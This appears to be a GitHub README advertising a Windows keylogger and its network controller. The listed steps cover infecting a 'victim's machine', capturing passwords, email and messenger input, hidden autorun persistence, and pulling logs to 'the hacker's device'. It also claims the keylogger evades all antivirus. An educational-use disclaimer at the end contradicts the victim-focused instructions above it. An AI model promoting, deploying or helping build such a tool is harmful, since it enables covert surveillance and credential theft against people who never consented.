An advanced keylogger for Windows starting with the 7th version and ending with the latest. At the time of writing, Malware is Not Detected by Any Antivirus. The Controller allows you to Automatically Detect and Pull Logs from All Infected PCs on the Local Network.
Brief instructions for use:
1. Run the Local Keylogger Agent on the victim's machine (accept the request for administrator rights, this is mandatory).
2. That's it, the target PC is now infected, you can delete the Agent's original .exe file if you want to.
3. You can run the Controller (located in a separate repository) - https://github.com/ArGul-0/Local-Keylogger-Controller, to remotely pull logs from all infected PCs on the local network to your device. The result will be saved to the Documents folder for your use.
4. When you go to the documents, you will see a file in .ZIP format and with the name in keylog format, the IP of the Infected machine, and the PORT of the Infected machine. After Opening / Unpacking it, you will see 2 .txt files.
5. By opening the file AllClicks.txt you will see all the keys pressed on the infected machine in the format: Date, time, key pressed. By opening the file OnlyKeyPressClicks.txt you will see all the characters entered in the fields (not all clicks, but field entries. For example, printing in the browser in the search bar, entering a password / mail, correspondence in messengers, etc.), that is, without keyboard shortcuts, random keystrokes, etc. Only field entries (It's very convenient).
Main advantages:
• Absolutely does not get burned by any antiviruses.
• The controller automatically detects all infected machines on the local network and pulls logs from them to the hacker's device.
• It has a recording mode not only for all clicks, but also for field entries (in this mode, for example, playing games will not be recorded, but input in the fields of mail, flogging, messengers and all other places where you can type will be recorded).
• It is sewn into the system, adds itself to the hidden autorun and creates its own copy, so that you can even delete the original one after the 1st launch.the exe file.
• It is very simple and intuitive to use.
Cons, unfortunately, it doesn't happen without them:
• Remote log pulling only works while on the same local network with infected devices.
• Malware works within the user who launched the malicious file (not on all users at the same time, each one will have to run the malware separately).
Video Example of Malware Usage:
Example-of-Malware-Usage.mp4
The project is distributed under the MIT license — see the LICENSE.md file.
⚠️ IMPORTANT — Responsible Use & Liability Notice
Purpose. This repository and its contents were created for educational, research, and defensive cybersecurity purposes only — e.g., for learning, testing in isolated labs, or demonstrating concepts to security professionals.
Prohibited use. You must not use, deploy, or run any files or tools from this repository against any system, network, or data unless you have explicit, written permission from the system owner. Unauthorized use may violate laws and cause serious harm.
Environment. Only use these materials in a controlled, offline, or isolated lab environment (e.g., VM with no network or on dedicated test hardware) where you are the authorized owner/operator.
No warranty / No liability. The author provides this repository as-is, without any warranty. The author disclaims all responsibility for any misuse, damage, loss, or legal consequences resulting from use of these materials. Nothing in this notice constitutes legal advice.
If in doubt. If you are unsure whether your planned use is permitted or lawful, do not proceed and consult appropriate legal counsel or your organization’s security/legal team.